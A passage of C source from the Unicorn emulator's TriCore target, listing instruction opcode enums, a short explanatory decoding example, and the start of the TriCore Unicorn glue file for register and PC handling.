* BRC Format */ /*OPCM_32_BRC_EQ_NEQ */ enum { OPC2_32_BRC_JEQ = 0x00, OPC2_32_BRC_JNE = 0x01, }; /* OPCM_32_BRC_GE */ enum { OP2_32_BRC_JGE = 0x00, OPC_32_BRC_JGE_U = 0x01, }; /* OPCM_32_BRC_JLT */ enum { OPC2_32_BRC_JLT = 0x00, OPC2_32_BRC_JLT_U = 0x01, }; /* OPCM_32_BRC_JNE */ enum { OPC2_32_BRC_JNED = 0x01, OPC2_32_BRC_JNEI = 0x00, }; /* * BRN Format */ /* OPCM_32_BRN_JTT */ enum { OPC2_32_BRN_JNZ_T = 0x01, OPC2_32_BRN_JZ_T = 0x00, }; /* * BRR Format */ /* OPCM_32_BRR_EQ_NEQ */ enum { OPC2_32_BRR_JEQ = 0x00, OPC2_32_BRR_JNE = 0x01, }; /* OPCM_32_BRR_ADDR_EQ_NEQ */ enum { OPC2_32_BRR_JEQ_A = 0x00, OPC2_32_BRR_JNE_A = 0x01, }; /*OPCM_32_BRR_GE */ enum { OPC2_32_BRR_JGE = 0x00, OPC2_32_BRR_JGE_U = 0x01, }; /* OPCM_32_BRR_JLT */ enum { OPC2_32_BRR_JLT = 0x00, OPC2_32_BRR_JLT_U = 0x01, }; /* OPCM_32_BRR_JNE */ enum { OPC2_32_BRR_JNED = 0x01, OPC2_32_BRR_JNEI = 0x00, }; /* OPCM_32_BRR_JNZ */ enum { OPC2_32_BRR_JNZ_A = 0x01, OPC2_32_BRR_JZ_A = 0x00, }; /* OPCM_32_BRR_LOOP */ enum { OPC2_32_BRR_LOOP = 0x00, OPC2_32_BRR_LOOPU = 0x01, }; /* * RC Format */ /* OPCM_32_RC_LOGICAL_SHIFT */ enum { OPC2_32_RC_AND = 0x08, OPC2_32_RC_ANDN = 0x0e, OPC2_32_RC_NAND = 0x09, OPC2_32_RC_NOR = 0x0b, OPC2_32_RC_OR = 0x0a, OPC2_32_RC_ORN = 0x0f, OPC2_32_RC_SH = 0x00, OPC2_32_RC_SH_H = 0x40, OPC2_32_RC_SHA = 0x01, OPC2_32_RC_SHA_H = 0x41, OPC2_32_RC_SHAS = 0x02, OPC2_32_RC_XNOR = 0x0d, OPC2_32_RC_XOR = 0x0c, }; /* OPCM_32_RC_ACCUMULATOR */ enum { OPC2_32_RC_ABSDIF = 0x0e, OPC2_32_RC_ABSDIFS = 0x0f, OPC2_32_RC_ADD = 0x00, OPC2_32_RC_ADDC = 0x05, OPC2_32_RC_ADDS = 0x02, OPC2_32_RC_ADDS_U = 0x03, OPC2_32_RC_ADDX = 0x04, OPC2_32_RC_AND_EQ = 0x20, OPC2_32_RC_AND_GE = 0x24, OPC2_32_RC_AND_GE_U = 0x25, OPC2_32_RC_AND_LT = 0x22, OPC2_32_RC_AND_LT_U = 0x23, OPC2_32_RC_AND_NE = 0x21, OPC2_32_RC_EQ = 0x10, OPC2_32_RC_EQANY_B = 0x56, OPC2_32_RC_EQANY_H = 0x76, OPC2_32_RC_GE = 0x14, OPC2_32_RC_GE_U = 0x15, OPC2_32_RC_LT = 0x12, OPC2_32_RC_LT_U = 0x13, OPC2_32_RC_MAX = 0x1a, OPC2_32_RC_MAX_U = 0x1b, OPC2_32_RC_MIN = 0x18, OPC2_32_RC_MIN_U = 0x19, OPC2_32_RC_NE = 0x11, OPC2_32_RC_OR_EQ = 0x27, OPC2_32_RC_OR_GE = 0x2b, OPC2_32_RC_OR_GE_U = 0x2c, OPC2_32_RC_OR_LT = 
0x29, OPC2_32_RC_OR_LT_U = 0x2a, OPC2_32_RC_OR_NE = 0x28, OPC2_32_RC_RSUB = 0x08, OPC2_32_RC_RSUBS = 0x0a, OPC2_32_RC_RSUBS_U = 0x0b, OPC2_32_RC_SH_EQ = 0x37, OPC2_32_RC_SH_GE = 0x3b, OPC2_32_RC_SH_GE_U = 0x3c, OPC2_32_RC_SH_LT = 0x39, OPC2_32_RC_SH_LT_U = 0x3a, OPC2_32_RC_SH_NE = 0x38, OPC2_32_RC_XOR_EQ = 0x2f, OPC2_32_RC_XOR_GE = 0x33, OPC2_32_RC_XOR_GE_U = 0x34, OPC2_32_RC_XOR_LT = 0x31, OPC2_32_RC_XOR_LT_U = 0x32, OPC2_32_RC_XOR_NE = 0x30, }; /* OPCM_32_RC_SERVICEROUTINE */ enum { OPC2_32_RC_BISR = 0x00, OPC2_32_RC_SYSCALL = 0x04, }; /* OPCM_32_RC_MUL */ enum { OPC2_32_RC_MUL_32 = 0x01, OPC2_32_RC_MUL_64 = 0x03, OPC2_32_RC_MULS_32 = 0x05, OPC2_32_RC_MUL_U_64 = 0x02, OPC2_32_RC_MULS_U_32 = 0x04, }; /* * RCPW Format */ /* OPCM_32_RCPW_MASK_INSERT */ enum { OPC2_32_RCPW_IMASK = 0x01, OPC2_32_RCPW_INSERT = 0x00, }; /* * RCR Format */ /* OPCM_32_RCR_COND_SELECT */ enum { OPC2_32_RCR_CADD = 0x00, OPC2_32_RCR_CADDN = 0x01, OPC2_32_RCR_SEL = 0x04, OPC2_32_RCR_SELN = 0x05, }; /* OPCM_32_RCR_MADD */ enum { OPC2_32_RCR_MADD_32 = 0x01, OPC2_32_RCR_MADD_64 = 0x03, OPC2_32_RCR_MADDS_32 = 0x05, OPC2_32_RCR_MADDS_64 = 0x07, OPC2_32_RCR_MADD_U_64 = 0x02, OPC2_32_RCR_MADDS_U_32 = 0x04, OPC2_32_RCR_MADDS_U_64 = 0x06, }; /* OPCM_32_RCR_MSUB */ enum { OPC2_32_RCR_MSUB_32 = 0x01, OPC2_32_RCR_MSUB_64 = 0x03, OPC2_32_RCR_MSUBS_32 = 0x05, OPC2_32_RCR_MSUBS_64 = 0x07, OPC2_32_RCR_MSUB_U_64 = 0x02, OPC2_32_RCR_MSUBS_U_32 = 0x04, OPC2_32_RCR_MSUBS_U_64 = 0x06, }; /* * RCRW Format */ /* OPCM_32_RCRW_MASK_INSERT */ enum { OPC2_32_RCRW_IMASK = 0x01, OPC2_32_RCRW_INSERT = 0x00, }; /* * RR Format */ /* OPCM_32_RR_LOGICAL_SHIFT */ enum { OPC2_32_RR_AND = 0x08, OPC2_32_RR_ANDN = 0x0e, OPC2_32_RR_CLO = 0x1c, OPC2_32_RR_CLO_H = 0x7d, OPC2_32_RR_CLS = 0x1d, OPC2_32_RR_CLS_H = 0x7e, OPC2_32_RR_CLZ = 0x1b, OPC2_32_RR_CLZ_H = 0x7c, OPC2_32_RR_NAND = 0x09, OPC2_32_RR_NOR = 0x0b, OPC2_32_RR_OR = 0x0a, OPC2_32_RR_ORN = 0x0f, OPC2_32_RR_SH = 0x00, OPC2_32_RR_SH_H = 0x40, OPC2_32_RR_SHA = 0x01, OPC2_32_RR_SHA_H = 0x41, OPC2_32_RR_SHAS = 0x02, OPC2_32_RR_XNOR = 0x0d, OPC2_32_RR_XOR = 0x0c, }; /* OPCM_32_RR_ACCUMULATOR */ enum { OPC2_32_RR_ABS = 0x1c, OPC2_32_RR_ABS_B = 0x5c, OPC2_32_RR_ABS_H = 0x7c, OPC2_32_RR_ABSDIF = 0x0e, OPC2_32_RR_ABSDIF_B = 0x4e, OPC2_32_RR_ABSDIF_H = 0x6e, OPC2_32_RR_ABSDIFS = 0x0f, OPC2_32_RR_ABSDIFS_H = 0x6f, OPC2_32_RR_ABSS = 0x1d, OPC2_32_RR_ABSS_H = 0x7d, OPC2_32_RR_ADD = 0x00, OPC2_32_RR_ADD_B = 0x40, OPC2_32_RR_ADD_H = 0x60, OPC2_32_RR_ADDC = 0x05, OPC2_32_RR_ADDS = 0x02, OPC2_32_RR_ADDS_H = 0x62, OPC2_32_RR_ADDS_HU = 0x63, OPC2_32_RR_ADDS_U = 0x03, OPC2_32_RR_ADDX = 0x04, OPC2_32_RR_AND_EQ = 0x20, OPC2_32_RR_AND_GE = 0x24, OPC2_32_RR_AND_GE_U = 0x25, OPC2_32_RR_AND_LT = 0x22, OPC2_32_RR_AND_LT_U = 0x23, OPC2_32_RR_AND_NE = 0x21, OPC2_32_RR_EQ = 0x10, OPC2_32_RR_EQ_B = 0x50, OPC2_32_RR_EQ_H = 0x70, OPC2_32_RR_EQ_W = 0x90, OPC2_32_RR_EQANY_B = 0x56, OPC2_32_RR_EQANY_H = 0x76, OPC2_32_RR_GE = 0x14, OPC2_32_RR_GE_U = 0x15, OPC2_32_RR_LT = 0x12, OPC2_32_RR_LT_U = 0x13, OPC2_32_RR_LT_B = 0x52, OPC2_32_RR_LT_BU = 0x53, OPC2_32_RR_LT_H = 0x72, OPC2_32_RR_LT_HU = 0x73, OPC2_32_RR_LT_W = 0x92, OPC2_32_RR_LT_WU = 0x93, OPC2_32_RR_MAX = 0x1a, OPC2_32_RR_MAX_U = 0x1b, OPC2_32_RR_MAX_B = 0x5a, OPC2_32_RR_MAX_BU = 0x5b, OPC2_32_RR_MAX_H = 0x7a, OPC2_32_RR_MAX_HU = 0x7b, OPC2_32_RR_MIN = 0x18, OPC2_32_RR_MIN_U = 0x19, OPC2_32_RR_MIN_B = 0x58, OPC2_32_RR_MIN_BU = 0x59, OPC2_32_RR_MIN_H = 0x78, OPC2_32_RR_MIN_HU = 0x79, OPC2_32_RR_MOV = 0x1f, OPC2_32_RR_MOVS_64 = 0x80, OPC2_32_RR_MOV_64 = 0x81, OPC2_32_RR_NE = 0x11, 
OPC2_32_RR_OR_EQ = 0x27, OPC2_32_RR_OR_GE = 0x2b, OPC2_32_RR_OR_GE_U = 0x2c, OPC2_32_RR_OR_LT = 0x29, OPC2_32_RR_OR_LT_U = 0x2a, OPC2_32_RR_OR_NE = 0x28, OPC2_32_RR_SAT_B = 0x5e, OPC2_32_RR_SAT_BU = 0x5f, OPC2_32_RR_SAT_H = 0x7e, OPC2_32_RR_SAT_HU = 0x7f, OPC2_32_RR_SH_EQ = 0x37, OPC2_32_RR_SH_GE = 0x3b, OPC2_32_RR_SH_GE_U = 0x3c, OPC2_32_RR_SH_LT = 0x39, OPC2_32_RR_SH_LT_U = 0x3a, OPC2_32_RR_SH_NE = 0x38, OPC2_32_RR_SUB = 0x08, OPC2_32_RR_SUB_B = 0x48, OPC2_32_RR_SUB_H = 0x68, OPC2_32_RR_SUBC = 0x0d, OPC2_32_RR_SUBS = 0x0a, OPC2_32_RR_SUBS_U = 0x0b, OPC2_32_RR_SUBS_H = 0x6a, OPC2_32_RR_SUBS_HU = 0x6b, OPC2_32_RR_SUBX = 0x0c, OPC2_32_RR_XOR_EQ = 0x2f, OPC2_32_RR_XOR_GE = 0x33, OPC2_32_RR_XOR_GE_U = 0x34, OPC2_32_RR_XOR_LT = 0x31, OPC2_32_RR_XOR_LT_U = 0x32, OPC2_32_RR_XOR_NE = 0x30, }; /* OPCM_32_RR_ADDRESS */ enum { OPC2_32_RR_ADD_A = 0x01, OPC2_32_RR_ADDSC_A = 0x60, OPC2_32_RR_ADDSC_AT = 0x62, OPC2_32_RR_EQ_A = 0x40, OPC2_32_RR_EQZ = 0x48, OPC2_32_RR_GE_A = 0x43, OPC2_32_RR_LT_A = 0x42, OPC2_32_RR_MOV_A = 0x63, OPC2_32_RR_MOV_AA = 0x00, OPC2_32_RR_MOV_D = 0x4c, OPC2_32_RR_NE_A = 0x41, OPC2_32_RR_NEZ_A = 0x49, OPC2_32_RR_SUB_A = 0x02, }; /* OPCM_32_RR_FLOAT */ enum { OPC2_32_RR_BMERGE = 0x01, OPC2_32_RR_BSPLIT = 0x09, OPC2_32_RR_DVINIT_B = 0x5a, OPC2_32_RR_DVINIT_BU = 0x4a, OPC2_32_RR_DVINIT_H = 0x3a, OPC2_32_RR_DVINIT_HU = 0x2a, OPC2_32_RR_DVINIT = 0x1a, OPC2_32_RR_DVINIT_U = 0x0a, OPC2_32_RR_PARITY = 0x02, OPC2_32_RR_UNPACK = 0x08, OPC2_32_RR_CRC32 = 0x03, OPC2_32_RR_DIV = 0x20, OPC2_32_RR_DIV_U = 0x21, OPC2_32_RR_MUL_F = 0x04, OPC2_32_RR_DIV_F = 0x05, OPC2_32_RR_FTOI = 0x10, OPC2_32_RR_ITOF = 0x14, OPC2_32_RR_CMP_F = 0x00, OPC2_32_RR_FTOIZ = 0x13, OPC2_32_RR_FTOQ31 = 0x11, OPC2_32_RR_FTOQ31Z = 0x18, OPC2_32_RR_FTOU = 0x12, OPC2_32_RR_FTOUZ = 0x17, OPC2_32_RR_Q31TOF = 0x15, OPC2_32_RR_QSEED_F = 0x19, OPC2_32_RR_UPDFL = 0x0c, OPC2_32_RR_UTOF = 0x16, }; /* OPCM_32_RR_IDIRECT */ enum { OPC2_32_RR_JI = 0x03, OPC2_32_RR_JLI = 0x02, OPC2_32_RR_CALLI = 0x00, OPC2_32_RR_FCALLI = 0x01, }; /* * RR1 Format */ /* OPCM_32_RR1_MUL */ enum { OPC2_32_RR1_MUL_H_32_LL = 0x1a, OPC2_32_RR1_MUL_H_32_LU = 0x19, OPC2_32_RR1_MUL_H_32_UL = 0x18, OPC2_32_RR1_MUL_H_32_UU = 0x1b, OPC2_32_RR1_MULM_H_64_LL = 0x1e, OPC2_32_RR1_MULM_H_64_LU = 0x1d, OPC2_32_RR1_MULM_H_64_UL = 0x1c, OPC2_32_RR1_MULM_H_64_UU = 0x1f, OPC2_32_RR1_MULR_H_16_LL = 0x0e, OPC2_32_RR1_MULR_H_16_LU = 0x0d, OPC2_32_RR1_MULR_H_16_UL = 0x0c, OPC2_32_RR1_MULR_H_16_UU = 0x0f, }; /* OPCM_32_RR1_MULQ */ enum { OPC2_32_RR1_MUL_Q_32 = 0x02, OPC2_32_RR1_MUL_Q_64 = 0x1b, OPC2_32_RR1_MUL_Q_32_L = 0x01, OPC2_32_RR1_MUL_Q_64_L = 0x19, OPC2_32_RR1_MUL_Q_32_U = 0x00, OPC2_32_RR1_MUL_Q_64_U = 0x18, OPC2_32_RR1_MUL_Q_32_LL = 0x05, OPC2_32_RR1_MUL_Q_32_UU = 0x04, OPC2_32_RR1_MULR_Q_32_L = 0x07, OPC2_32_RR1_MULR_Q_32_U = 0x06, }; /* * RR2 Format */ /* OPCM_32_RR2_MUL */ enum { OPC2_32_RR2_MUL_32 = 0x0a, OPC2_32_RR2_MUL_64 = 0x6a, OPC2_32_RR2_MULS_32 = 0x8a, OPC2_32_RR2_MUL_U_64 = 0x68, OPC2_32_RR2_MULS_U_32 = 0x88, }; /* * RRPW Format */ /* OPCM_32_RRPW_EXTRACT_INSERT */ enum { OPC2_32_RRPW_EXTR = 0x02, OPC2_32_RRPW_EXTR_U = 0x03, OPC2_32_RRPW_IMASK = 0x01, OPC2_32_RRPW_INSERT = 0x00, }; /* * RRR Format */ /* OPCM_32_RRR_COND_SELECT */ enum { OPC2_32_RRR_CADD = 0x00, OPC2_32_RRR_CADDN = 0x01, OPC2_32_RRR_CSUB = 0x02, OPC2_32_RRR_CSUBN = 0x03, OPC2_32_RRR_SEL = 0x04, OPC2_32_RRR_SELN = 0x05, }; /* OPCM_32_RRR_FLOAT */ enum { OPC2_32_RRR_DVADJ = 0x0d, OPC2_32_RRR_DVSTEP = 0x0f, OPC2_32_RRR_DVSTEP_U = 0x0e, OPC2_32_RRR_IXMAX = 0x0a, OPC2_32_RRR_IXMAX_U = 0x0b, 
OPC2_32_RRR_IXMIN = 0x08, OPC2_32_RRR_IXMIN_U = 0x09, OPC2_32_RRR_PACK = 0x00, OPC2_32_RRR_ADD_F = 0x02, OPC2_32_RRR_SUB_F = 0x03, OPC2_32_RRR_MADD_F = 0x06, OPC2_32_RRR_MSUB_F = 0x07, }; /* * RRR1 Format */ /* OPCM_32_RRR1_MADD */ enum { OPC2_32_RRR1_MADD_H_LL = 0x1a, OPC2_32_RRR1_MADD_H_LU = 0x19, OPC2_32_RRR1_MADD_H_UL = 0x18, OPC2_32_RRR1_MADD_H_UU = 0x1b, OPC2_32_RRR1_MADDS_H_LL = 0x3a, OPC2_32_RRR1_MADDS_H_LU = 0x39, OPC2_32_RRR1_MADDS_H_UL = 0x38, OPC2_32_RRR1_MADDS_H_UU = 0x3b, OPC2_32_RRR1_MADDM_H_LL = 0x1e, OPC2_32_RRR1_MADDM_H_LU = 0x1d, OPC2_32_RRR1_MADDM_H_UL = 0x1c, OPC2_32_RRR1_MADDM_H_UU = 0x1f, OPC2_32_RRR1_MADDMS_H_LL = 0x3e, OPC2_32_RRR1_MADDMS_H_LU = 0x3d, OPC2_32_RRR1_MADDMS_H_UL = 0x3c, OPC2_32_RRR1_MADDMS_H_UU = 0x3f, OPC2_32_RRR1_MADDR_H_LL = 0x0e, OPC2_32_RRR1_MADDR_H_LU = 0x0d, OPC2_32_RRR1_MADDR_H_UL = 0x0c, OPC2_32_RRR1_MADDR_H_UU = 0x0f, OPC2_32_RRR1_MADDRS_H_LL = 0x2e, OPC2_32_RRR1_MADDRS_H_LU = 0x2d, OPC2_32_RRR1_MADDRS_H_UL = 0x2c, OPC2_32_RRR1_MADDRS_H_UU = 0x2f, }; /* OPCM_32_RRR1_MADDQ_H */ enum { OPC2_32_RRR1_MADD_Q_32 = 0x02, OPC2_32_RRR1_MADD_Q_64 = 0x1b, OPC2_32_RRR1_MADD_Q_32_L = 0x01, OPC2_32_RRR1_MADD_Q_64_L = 0x19, OPC2_32_RRR1_MADD_Q_32_U = 0x00, OPC2_32_RRR1_MADD_Q_64_U = 0x18, OPC2_32_RRR1_MADD_Q_32_LL = 0x05, OPC2_32_RRR1_MADD_Q_64_LL = 0x1d, OPC2_32_RRR1_MADD_Q_32_UU = 0x04, OPC2_32_RRR1_MADD_Q_64_UU = 0x1c, OPC2_32_RRR1_MADDS_Q_32 = 0x22, OPC2_32_RRR1_MADDS_Q_64 = 0x3b, OPC2_32_RRR1_MADDS_Q_32_L = 0x21, OPC2_32_RRR1_MADDS_Q_64_L = 0x39, OPC2_32_RRR1_MADDS_Q_32_U = 0x20, OPC2_32_RRR1_MADDS_Q_64_U = 0x38, OPC2_32_RRR1_MADDS_Q_32_LL = 0x25, OPC2_32_RRR1_MADDS_Q_64_LL = 0x3d, OPC2_32_RRR1_MADDS_Q_32_UU = 0x24, OPC2_32_RRR1_MADDS_Q_64_UU = 0x3c, OPC2_32_RRR1_MADDR_H_64_UL = 0x1e, OPC2_32_RRR1_MADDRS_H_64_UL = 0x3e, OPC2_32_RRR1_MADDR_Q_32_LL = 0x07, OPC2_32_RRR1_MADDR_Q_32_UU = 0x06, OPC2_32_RRR1_MADDRS_Q_32_LL = 0x27, OPC2_32_RRR1_MADDRS_Q_32_UU = 0x26, }; /* OPCM_32_RRR1_MADDSU_H */ enum { OPC2_32_RRR1_MADDSU_H_32_LL = 0x1a, OPC2_32_RRR1_MADDSU_H_32_LU = 0x19, OPC2_32_RRR1_MADDSU_H_32_UL = 0x18, OPC2_32_RRR1_MADDSU_H_32_UU = 0x1b, OPC2_32_RRR1_MADDSUS_H_32_LL = 0x3a, OPC2_32_RRR1_MADDSUS_H_32_LU = 0x39, OPC2_32_RRR1_MADDSUS_H_32_UL = 0x38, OPC2_32_RRR1_MADDSUS_H_32_UU = 0x3b, OPC2_32_RRR1_MADDSUM_H_64_LL = 0x1e, OPC2_32_RRR1_MADDSUM_H_64_LU = 0x1d, OPC2_32_RRR1_MADDSUM_H_64_UL = 0x1c, OPC2_32_RRR1_MADDSUM_H_64_UU = 0x1f, OPC2_32_RRR1_MADDSUMS_H_64_LL = 0x3e, OPC2_32_RRR1_MADDSUMS_H_64_LU = 0x3d, OPC2_32_RRR1_MADDSUMS_H_64_UL = 0x3c, OPC2_32_RRR1_MADDSUMS_H_64_UU = 0x3f, OPC2_32_RRR1_MADDSUR_H_16_LL = 0x0e, OPC2_32_RRR1_MADDSUR_H_16_LU = 0x0d, OPC2_32_RRR1_MADDSUR_H_16_UL = 0x0c, OPC2_32_RRR1_MADDSUR_H_16_UU = 0x0f, OPC2_32_RRR1_MADDSURS_H_16_LL = 0x2e, OPC2_32_RRR1_MADDSURS_H_16_LU = 0x2d, OPC2_32_RRR1_MADDSURS_H_16_UL = 0x2c, OPC2_32_RRR1_MADDSURS_H_16_UU = 0x2f, }; /* OPCM_32_RRR1_MSUB_H */ enum { OPC2_32_RRR1_MSUB_H_LL = 0x1a, OPC2_32_RRR1_MSUB_H_LU = 0x19, OPC2_32_RRR1_MSUB_H_UL = 0x18, OPC2_32_RRR1_MSUB_H_UU = 0x1b, OPC2_32_RRR1_MSUBS_H_LL = 0x3a, OPC2_32_RRR1_MSUBS_H_LU = 0x39, OPC2_32_RRR1_MSUBS_H_UL = 0x38, OPC2_32_RRR1_MSUBS_H_UU = 0x3b, OPC2_32_RRR1_MSUBM_H_LL = 0x1e, OPC2_32_RRR1_MSUBM_H_LU = 0x1d, OPC2_32_RRR1_MSUBM_H_UL = 0x1c, OPC2_32_RRR1_MSUBM_H_UU = 0x1f, OPC2_32_RRR1_MSUBMS_H_LL = 0x3e, OPC2_32_RRR1_MSUBMS_H_LU = 0x3d, OPC2_32_RRR1_MSUBMS_H_UL = 0x3c, OPC2_32_RRR1_MSUBMS_H_UU = 0x3f, OPC2_32_RRR1_MSUBR_H_LL = 0x0e, OPC2_32_RRR1_MSUBR_H_LU = 0x0d, OPC2_32_RRR1_MSUBR_H_UL = 0x0c, OPC2_32_RRR1_MSUBR_H_UU = 0x0f, 
OPC2_32_RRR1_MSUBRS_H_LL = 0x2e, OPC2_32_RRR1_MSUBRS_H_LU = 0x2d, OPC2_32_RRR1_MSUBRS_H_UL = 0x2c, OPC2_32_RRR1_MSUBRS_H_UU = 0x2f, }; /* OPCM_32_RRR1_MSUB_Q */ enum { OPC2_32_RRR1_MSUB_Q_32 = 0x02, OPC2_32_RRR1_MSUB_Q_64 = 0x1b, OPC2_32_RRR1_MSUB_Q_32_L = 0x01, OPC2_32_RRR1_MSUB_Q_64_L = 0x19, OPC2_32_RRR1_MSUB_Q_32_U = 0x00, OPC2_32_RRR1_MSUB_Q_64_U = 0x18, OPC2_32_RRR1_MSUB_Q_32_LL = 0x05, OPC2_32_RRR1_MSUB_Q_64_LL = 0x1d, OPC2_32_RRR1_MSUB_Q_32_UU = 0x04, OPC2_32_RRR1_MSUB_Q_64_UU = 0x1c, OPC2_32_RRR1_MSUBS_Q_32 = 0x22, OPC2_32_RRR1_MSUBS_Q_64 = 0x3b, OPC2_32_RRR1_MSUBS_Q_32_L = 0x21, OPC2_32_RRR1_MSUBS_Q_64_L = 0x39, OPC2_32_RRR1_MSUBS_Q_32_U = 0x20, OPC2_32_RRR1_MSUBS_Q_64_U = 0x38, OPC2_32_RRR1_MSUBS_Q_32_LL = 0x25, OPC2_32_RRR1_MSUBS_Q_64_LL = 0x3d, OPC2_32_RRR1_MSUBS_Q_32_UU = 0x24, OPC2_32_RRR1_MSUBS_Q_64_UU = 0x3c, OPC2_32_RRR1_MSUBR_H_64_UL = 0x1e, OPC2_32_RRR1_MSUBRS_H_64_UL = 0x3e, OPC2_32_RRR1_MSUBR_Q_32_LL = 0x07, OPC2_32_RRR1_MSUBR_Q_32_UU = 0x06, OPC2_32_RRR1_MSUBRS_Q_32_LL = 0x27, OPC2_32_RRR1_MSUBRS_Q_32_UU = 0x26, }; /* OPCM_32_RRR1_MSUBADS_H */ enum { OPC2_32_RRR1_MSUBAD_H_32_LL = 0x1a, OPC2_32_RRR1_MSUBAD_H_32_LU = 0x19, OPC2_32_RRR1_MSUBAD_H_32_UL = 0x18, OPC2_32_RRR1_MSUBAD_H_32_UU = 0x1b, OPC2_32_RRR1_MSUBADS_H_32_LL = 0x3a, OPC2_32_RRR1_MSUBADS_H_32_LU = 0x39, OPC2_32_RRR1_MSUBADS_H_32_UL = 0x38, OPC2_32_RRR1_MSUBADS_H_32_UU = 0x3b, OPC2_32_RRR1_MSUBADM_H_64_LL = 0x1e, OPC2_32_RRR1_MSUBADM_H_64_LU = 0x1d, OPC2_32_RRR1_MSUBADM_H_64_UL = 0x1c, OPC2_32_RRR1_MSUBADM_H_64_UU = 0x1f, OPC2_32_RRR1_MSUBADMS_H_64_LL = 0x3e, OPC2_32_RRR1_MSUBADMS_H_64_LU = 0x3d, OPC2_32_RRR1_MSUBADMS_H_64_UL = 0x3c, OPC2_32_RRR1_MSUBADMS_H_64_UU = 0x3f, OPC2_32_RRR1_MSUBADR_H_16_LL = 0x0e, OPC2_32_RRR1_MSUBADR_H_16_LU = 0x0d, OPC2_32_RRR1_MSUBADR_H_16_UL = 0x0c, OPC2_32_RRR1_MSUBADR_H_16_UU = 0x0f, OPC2_32_RRR1_MSUBADRS_H_16_LL = 0x2e, OPC2_32_RRR1_MSUBADRS_H_16_LU = 0x2d, OPC2_32_RRR1_MSUBADRS_H_16_UL = 0x2c, OPC2_32_RRR1_MSUBADRS_H_16_UU = 0x2f, }; /* * RRR2 Format */ /* OPCM_32_RRR2_MADD */ enum { OPC2_32_RRR2_MADD_32 = 0x0a, OPC2_32_RRR2_MADD_64 = 0x6a, OPC2_32_RRR2_MADDS_32 = 0x8a, OPC2_32_RRR2_MADDS_64 = 0xea, OPC2_32_RRR2_MADD_U_64 = 0x68, OPC2_32_RRR2_MADDS_U_32 = 0x88, OPC2_32_RRR2_MADDS_U_64 = 0xe8, }; /* OPCM_32_RRR2_MSUB */ enum { OPC2_32_RRR2_MSUB_32 = 0x0a, OPC2_32_RRR2_MSUB_64 = 0x6a, OPC2_32_RRR2_MSUBS_32 = 0x8a, OPC2_32_RRR2_MSUBS_64 = 0xea, OPC2_32_RRR2_MSUB_U_64 = 0x68, OPC2_32_RRR2_MSUBS_U_32 = 0x88, OPC2_32_RRR2_MSUBS_U_64 = 0xe8, }; /* * RRRR Format */ /* OPCM_32_RRRR_EXTRACT_INSERT */ enum { OPC2_32_RRRR_DEXTR = 0x04, OPC2_32_RRRR_EXTR = 0x02, OPC2_32_RRRR_EXTR_U = 0x03, OPC2_32_RRRR_INSERT = 0x00, }; /* * RRRW Format */ /* OPCM_32_RRRW_EXTRACT_INSERT */ enum { OPC2_32_RRRW_EXTR = 0x02, OPC2_32_RRRW_EXTR_U = 0x03, OPC2_32_RRRW_IMASK = 0x01, OPC2_32_RRRW_INSERT = 0x00, }; /* * SYS Format */ /* OPCM_32_SYS_INTERRUPTS */ enum { OPC2_32_SYS_DEBUG = 0x04, OPC2_32_SYS_DISABLE = 0x0d, OPC2_32_SYS_DSYNC = 0x12, OPC2_32_SYS_ENABLE = 0x0c, OPC2_32_SYS_ISYNC = 0x13, OPC2_32_SYS_NOP = 0x00, OPC2_32_SYS_RET = 0x06, OPC2_32_SYS_RFE = 0x07, OPC2_32_SYS_RFM = 0x05, OPC2_32_SYS_RSLCX = 0x09, OPC2_32_SYS_SVLCX = 0x08, OPC2_32_SYS_TRAPSV = 0x15, OPC2_32_SYS_TRAPV = 0x14, OPC2_32_SYS_RESTORE = 0x0e, OPC2_32_SYS_FRET = 0x03, }; #endif 
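
The masks and enums above are meant to be combined in two steps: the primary opcode (assumed here to be the low byte of a 32-bit TriCore instruction word, which is what MASK_OP_MAJOR extracts earlier in this header) selects an OPCM_* group, and the format-specific OP2 field selects the concrete instruction inside that group. Below is a minimal stand-alone sketch of that flow, not the real decoder: extract_bits() and decode_rc() are hypothetical helpers invented for the illustration, extract_bits() mirrors what MASK_BITS_SHIFT(op, lo, hi) plausibly does, and the field positions come from the RC-format masks above.

    #include <stdint.h>
    #include <stdio.h>

    /* Model of MASK_BITS_SHIFT(op, lo, hi): extract bits lo..hi inclusive. */
    static uint32_t extract_bits(uint32_t op, int lo, int hi)
    {
        return (op >> lo) & ((1u << (hi - lo + 1)) - 1u);
    }

    static void decode_rc(uint32_t insn)
    {
        uint32_t op1    = extract_bits(insn, 0, 7);   /* primary opcode (assumed)   */
        uint32_t op2    = extract_bits(insn, 21, 27); /* MASK_OP_RC_OP2             */
        uint32_t const9 = extract_bits(insn, 12, 20); /* MASK_OP_RC_CONST9          */
        uint32_t s1     = extract_bits(insn, 8, 11);  /* MASK_OP_RC_S1              */
        uint32_t d      = extract_bits(insn, 28, 31); /* MASK_OP_RC_D               */

        if (op1 == 0x8b /* OPCM_32_RC_ACCUMULATOR */ &&
            op2 == 0x00 /* OPC2_32_RC_ADD */) {
            printf("add d%u, d%u, #%u\n", d, s1, const9);
        }
    }

    int main(void)
    {
        /* ADD d3, d1, #5, assembled by hand from the field layout above. */
        uint32_t insn = (3u << 28) | (0x00u << 21) | (5u << 12) | (1u << 8) | 0x8bu;
        decode_rc(insn);
        return 0;
    }

Compiled as C99 this prints "add d3, d1, #5". The real decoder additionally sign-extends CONST9 for arithmetic instructions, which is what the MASK_OP_RC_CONST9_SEXT variant above exists for; the sketch skips that.
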
unicorn-2.1.1/qemu/target/tricore/unicorn.c

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */
/* Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022
   Copyright 2022 Aptiv */

#include "qemu/typedefs.h"
#include "unicorn/unicorn.h"
#include "sysemu/cpus.h"
#include "sysemu/tcg.h"
#include "cpu.h"
#include "uc_priv.h"
#include "unicorn_common.h"
#include "unicorn.h"

TriCoreCPU *cpu_tricore_init(struct uc_struct *uc);

static void tricore_set_pc(struct uc_struct *uc, uint64_t address)
{
    ((CPUTriCoreState *)uc->cpu->env_ptr)->PC = address;
}

static uint64_t tricore_get_pc(struct uc_struct *uc)
{
    return ((CPUTriCoreState *)uc->cpu->env_ptr)->PC;
}

static void reg_reset(struct uc_struct *uc)
{
    CPUTriCoreState *env;
    (void)uc;

    env = uc->cpu->env_ptr;
    memset(env->gpr_a, 0, sizeof(env->gpr_a));
    memset(env->gpr_d, 0, sizeof(env->gpr_d));

    env->PC = 0;
}

DEFAULT_VISIBILITY
uc_err reg_read(void *_env, int mode, unsigned int regid, void *value,
